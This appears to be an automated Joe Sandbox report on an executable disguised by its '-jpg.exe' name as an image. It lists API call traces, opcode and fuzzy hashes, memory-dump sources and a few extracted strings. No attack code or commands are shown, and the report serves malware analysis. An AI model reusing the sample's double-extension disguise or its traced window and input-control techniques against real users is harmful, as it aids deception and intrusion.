                                                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                          • String ID:
                                                                                                          • API String ID: 262282135-0
                                                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                          APIs
                                                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3771399671-0
                                                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 0-1603158881
                                                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                          • String ID: close all$#v
                                                                                                          • API String ID: 4174999648-3101823635
                                                                                                          • Opcode ID: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                          • Opcode Fuzzy Hash: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                          APIs
                                                                                                          • CreateMenu.USER32 ref: 00448603
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 161812096-4108050209
                                                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe), ref: 00434057
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                          Strings
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                          • C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, xrefs: 00434040
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                          • API String ID: 3648134473-2801437729
                                                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4e56f2396f7e7809e52916909b083b2a88d0aa7af8933ce1416b3d8aceb115a
                                                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                          • Opcode Fuzzy Hash: b4e56f2396f7e7809e52916909b083b2a88d0aa7af8933ce1416b3d8aceb115a
                                                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,0040F545,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,004A90E8,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 978794511-0
                                                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
